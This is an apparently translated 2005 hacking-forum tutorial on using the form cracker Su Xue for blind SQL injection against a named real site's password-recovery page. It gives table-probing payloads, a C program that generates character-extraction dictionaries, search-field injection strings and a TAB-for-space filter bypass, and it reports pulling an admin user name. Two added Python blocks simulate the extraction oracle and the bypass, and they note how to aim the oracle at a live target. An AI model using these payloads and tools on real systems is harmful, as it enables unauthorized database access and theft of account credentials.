Su Xue (溯雪) in SQL injection - vulnerability warning - Black Bar Security Network (黑吧安全网)

Published: Nov 02, 2005 - 12:00 a.m.
Author: Anonymous (佚名)
Source: www.myhack58.com
Target readers: script-intrusion enthusiasts, hacking enthusiasts
Prerequisite knowledge: basic usage of Su Xue
Su Xue (溯雪) is a web-form cracker released by Xiao Rong (小榕) in October 2000. It is mainly used to brute-force the login forms of web pages and was once a good tool for cracking mailbox accounts. Since web pages now generally use numeric verification codes, Su Xue has lost its former standing. But when we turn it to SQL injection it yields an unexpected result. One can only say that a classic tool is always a classic!

Using Su Xue for SQL injection

Seeing this title, everyone will probably find it strange: has Su Xue, which was supposed to be obsolete, really been combined with the newest scripting attacks? It is hard to believe, but it is true. I will not keep everyone in suspense, so let us begin!

First, the advantages of Su Xue for SQL injection:

◆It is a free product, which poor newbies will certainly welcome.
◆It supports proxies, including proxies that require authentication, which is very good for hiding yourself.
◆The detection process is fairly stable and does not hang.
◆Its favourites are integrated with IE and updated in sync.

Let us go on to analyse the feasibility of using it for SQL injection. SQL injection means placing the query we want to run inside a variable that the page fails to filter, so as to achieve cross-table and cross-database queries. Usually we inject through the items of a submitted form. Because IIS by default logs only the URL and query string, not the body of a POST, injection through a form leaves far less trace than injection through the URL (the request itself is still logged; only the form contents are not), so it is relatively covert. When injecting article-search variables and the like it has an advantage other tools cannot match, because we can customise the injected content ourselves and so gain much more flexibility; there is also no tool on the Internet that automatically injects into a site's internal search variables.

In view of this flexibility, I started by taking a well-known domestic hacking-software download site, http://www.chinesehack.org, as the target of an injection test. First go to this page:
http://www.chinesehack.org/member/getpass.asp
This is the member password-recovery page. Entering a single quote (') here and submitting produces an HTTP 500 internal server error, a preliminary sign that a SQL injection vulnerability exists. Next comes manual guessing of table and field names. Because the server handles this variable specially, other tools such as NBSI2 and WED cannot guess it, and constructing a submission URL such as http://www.chinesehack.org/member/getpass.asp?username=1 does not succeed either. So what exactly do we do?
We first guess the table name by entering in the input box:
1' or exists(select * from admin) and '1

If we arrive at the prompt "Password recovery step two: please enter the answer to your password question", the table Admin exists: the OR clause made the WHERE condition true even though no user called 1 exists. If we enter "1' or exists(select * from users) and '1" instead and get an HTTP 500 internal server error, the table Users does not exist.
Following this method it is easy to obtain the two fields User and Pass in the Admin table.

Now for the key part: we can start guessing the account and password. Since there is no ready-made tool, guessing the complete account and password by manual injection would take a very long time, so we let Su Xue help us! First we need a dictionary containing the injection statements. We can write a small C program that generates the injection statements directly. The program source is as follows:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Strip the newline that fgets() leaves at the end of the line. */
static void chomp(char *s)
{
    s[strcspn(s, "\r\n")] = '\0';
}

int main(void)
{
    FILE *fp;
    char string1[100]; /* text before the number, e.g. "1' or (select top 1 asc(mid(user,1,1)) from Admin)=" */
    char string2[100]; /* text after the number, e.g. " and '1" */
    char line[32];
    int i, max, min;

    printf("enter inject words:\n");
    if (fgets(string1, sizeof string1, stdin) == NULL) return 1;
    chomp(string1);
    printf("enter the min number:");
    if (fgets(line, sizeof line, stdin) == NULL || sscanf(line, "%d", &min) != 1) return 1;
    printf("enter the max number:");
    if (fgets(line, sizeof line, stdin) == NULL || sscanf(line, "%d", &max) != 1) return 1;
    printf("enter the last word:\n");
    if (fgets(string2, sizeof string2, stdin) == NULL) return 1;
    chomp(string2);

    fp = fopen("inject.txt", "w");
    if (fp == NULL) { printf("can not open inject.txt\n"); exit(1); }
    /* One dictionary line per candidate value: prefix, number, suffix. */
    for (i = min; i <= max; i++)
        fprintf(fp, "%s%d%s\n", string1, i, string2);
    fclose(fp);
    printf("make successful!\n");
    return 0;
}

Compile and link this into an executable, then use it to generate the injection dictionary. The tool writes inject.txt in the current directory; for the first character of the user field, with the ASCII range 32 to 122, its contents are as follows:

1' or (select top 1 asc(mid(user,1,1)) from Admin)=32 and '1
1' or (select top 1 asc(mid(user,1,1)) from Admin)=33 and '1
1' or (select top 1 asc(mid(user,1,1)) from Admin)=34 and '1
...
1' or (select top 1 asc(mid(user,1,1)) from Admin)=122 and '1

The ASCII range can be customised. Note that asc(), mid() and top are Access (JET) syntax, which is what this kind of ASP site runs on; each line is true exactly when the first character of the first user name in Admin has that ASCII code.
With the dictionary ready, open Su Xue, go to the page http://www.chinesehack.org/member/getpass.asp, extract the form, double-click Username at the lower left, choose Dictionary in the dialog that pops up, fill in the inject.txt I just generated, and click OK. Then choose Start from the Run menu and enter "none of the user name, please register a new user!" as the error flag (the text the page returns when the injected condition is false); Su Xue then starts running. Friends who have not used Su Xue can go to http://www.netxeyes.com for detailed usage help.

Soon we get the ASCII code of the first character of the user name: the dictionary line whose response does not carry the error flag is the hit, and its number is 108, that is "l". So we have the first character of the user name, much faster than by hand! In the same way we can get the remaining characters; all I got was lilitou. You can try for yourself and see whether the result is the same. Next comes cracking the password, on the same principle; since the password is MD5-hashed I did not continue, and getting it would not be of much use to anyone anyway. I am only illustrating the method here.
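The extraction loop described above, as an added example that is not part of the original article or of Su Xue: a constructed stand-in for getpass.asp answers the article's payload shape against a made-up Admin table (the user name lilitou and the error string are taken from the article's description and are assumptions here), and two extractors drive it. char_linear does what Su Xue does with the dictionary, one request per candidate value; char_bisect shows the binary-search variant a practitioner would prefer, which needs about seven requests per character instead of up to ninety-one. The request counter makes the difference visible.

```python
import re

# Constructed stand-in for the vulnerable getpass.asp page. The real page ran an
# Access query of the shape ... WHERE username='<input>' ...; this fake only
# evaluates the payload shape used in the article, so the example runs offline.
FAKE_ADMIN_USER = "lilitou"   # assumption: the value the article reports
ERROR_FLAG = "none of the user name, please register a new user!"
NEXT_STEP = "Password recovery step two: please enter the answer to your password question"

_PAYLOAD_RE = re.compile(
    r"^1' or \(select top 1 asc\(mid\(user,(\d+),1\)\) from Admin\)([=<>])(\d+) and '1$"
)

def fake_getpass(username_field: str) -> str:
    """Simulated response: the error flag unless the injected condition is true."""
    m = _PAYLOAD_RE.match(username_field)
    if m is None:
        return ERROR_FLAG            # plain input: there is no user called '1'
    pos, op, value = int(m.group(1)), m.group(2), int(m.group(3))
    if pos > len(FAKE_ADMIN_USER):
        return ERROR_FLAG            # assumption: mid() past the end makes the condition false
    c = ord(FAKE_ADMIN_USER[pos - 1])
    cond = {"=": c == value, "<": c < value, ">": c > value}[op]
    return NEXT_STEP if cond else ERROR_FLAG

def make_payload(pos: int, op: str, value: int) -> str:
    """The same line the C generator writes, with the comparison operator parameterised."""
    return f"1' or (select top 1 asc(mid(user,{pos},1)) from Admin){op}{value} and '1"

class Oracle:
    """Wraps the page and counts requests, which is what the run time depends on."""
    def __init__(self):
        self.requests = 0

    def true(self, payload: str) -> bool:
        self.requests += 1
        return ERROR_FLAG not in fake_getpass(payload)

def char_linear(o: Oracle, pos: int, lo: int = 32, hi: int = 122):
    """What Su Xue does with the dictionary: one request per candidate value."""
    for v in range(lo, hi + 1):
        if o.true(make_payload(pos, "=", v)):
            return chr(v)
    return None

def char_bisect(o: Oracle, pos: int, lo: int = 32, hi: int = 126):
    """Binary search with '>': roughly log2(95) requests per character."""
    if not o.true(make_payload(pos, ">", 0)):
        return None                  # no character at this position
    while lo < hi:
        mid = (lo + hi) // 2
        if o.true(make_payload(pos, ">", mid)):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)

def extract_user(method) -> tuple:
    """Walk positions 1, 2, ... until the oracle says no character is there."""
    o = Oracle()
    out = []
    pos = 1
    while True:
        ch = method(o, pos)
        if ch is None:
            break
        out.append(ch)
        pos += 1
    return "".join(out), o.requests

if __name__ == "__main__":
    for name, fn in (("linear", char_linear), ("bisect", char_bisect)):
        user, n = extract_user(fn)
        print(f"{name}: user={user!r} after {n} requests")
```

Against a real target the only change is replacing fake_getpass with an HTTP POST of the form and the same "error flag not present" test; that test is exactly the judgment Su Xue makes on each dictionary line.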
Next, the injection method for search variables. First enter a single quote (') in the query box and submit to see whether an injection vulnerability exists; an internal server error, a database error and the like all indicate one. We then construct the injection statements. First enter a commonly used character, such as 1, so that the query returns some information, and then start injecting:
1%' and exists(select * from admin) and '%1
If this returns the same information as the plain query, the table exists (the search normally runs a LIKE '%...%' match, so the payload closes that pattern and reopens it at the end). Similarly:
1%' and exists(select username from admin) and '%1
guesses the field, and the rest is handed over to Su Xue. In fact Su Xue's real strength lies in how it judges the returned information: it can distinguish by the returned HTTP status code (200, 500, 404 and so on) or by a string in the page, and it can inject into variables that other software simply cannot, such as those of type="hidden". More important still, we have far more flexibility in constructing the injection statements.

In addition, we can use Su Xue to inject into variables whose spaces are filtered out (the article found this with a Trim()-style filter). The method is to use the TAB key instead of spaces when generating the dictionary, or to open the generated dictionary in UltraEdit, switch to hex editing and replace every 20 with 09 (TAB is ASCII 9, hex 09; do not use 0A, which is a line feed and would split each payload across lines). With this dictionary the injection succeeds; the Power article system Access edition v3.5 that I downloaded seems to filter only spaces.
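The space-filter bypass described above, as an added example that is not part of the original article: a constructed filter that removes ordinary spaces (0x20) and nothing else, shown against the article's payload before and after its spaces are turned into TABs (0x09), plus the dictionary writer in both byte forms so the difference between 09 and 0A is visible. The filter is a model of the behaviour the article describes, not code from the system it names.

```python
# Constructed model of the filter the article ran into: ordinary spaces are
# removed, other whitespace is left alone (assumption about the target's code).
def space_filter(value: str) -> str:
    return value.replace(" ", "")

def tabify(payload: str) -> str:
    """The article's bypass: every space in the payload becomes a TAB (0x09)."""
    return payload.replace(" ", "\t")

def tokens(sql: str) -> list:
    """Split on any whitespace; SQL treats spaces and tabs alike between keywords."""
    return sql.split()

def survives(payload: str) -> bool:
    """True if the payload still has the same tokens after the filter has run."""
    return tokens(space_filter(payload)) == tokens(payload)

def build_dictionary(lines, sep: str = "\t") -> bytes:
    """Bytes of a dictionary file with `sep` in place of each space.
    With sep='\\t' (byte 09) every payload stays on one line; with sep='\\n'
    (byte 0A, a line feed, not a TAB) every space becomes a line break."""
    return "".join(line.replace(" ", sep) + "\n" for line in lines).encode("ascii")

# Constructed sample payload, the table-existence check from the article.
PAYLOAD = "1' or exists(select * from admin) and '1"

if __name__ == "__main__":
    print("plain payload survives filter:", survives(PAYLOAD))          # False
    print("TAB payload survives filter:  ", survives(tabify(PAYLOAD)))  # True
    with open("inject.txt", "wb") as f:
        f.write(build_dictionary([PAYLOAD]))
    print("lines with 09:", build_dictionary([PAYLOAD]).count(b"\n"))
    print("lines with 0A:", build_dictionary([PAYLOAD], sep="\n").count(b"\n"))
```

The check is deliberately done on tokens rather than on the raw string: the database does not care which whitespace byte separated the keywords, only that they are separated, which is why a TAB slips past a filter that looks for 0x20 alone.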

Su Xue in fact has many other uses; it deserves to be called a classic piece of hacking software that has stood the test of time. Use your imagination and develop its other functions!